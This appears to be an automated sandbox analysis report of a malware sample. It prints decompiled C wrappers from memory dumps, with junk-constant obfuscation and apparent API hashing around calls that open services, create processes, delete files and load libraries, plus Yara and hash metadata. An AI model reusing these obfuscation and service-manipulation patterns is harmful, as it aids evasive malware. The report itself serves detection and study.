                                          C-Code - Quality: 54%
                                          			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0022602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0022602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00225FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0022602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0021602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0021602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0021602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00214859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0021602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
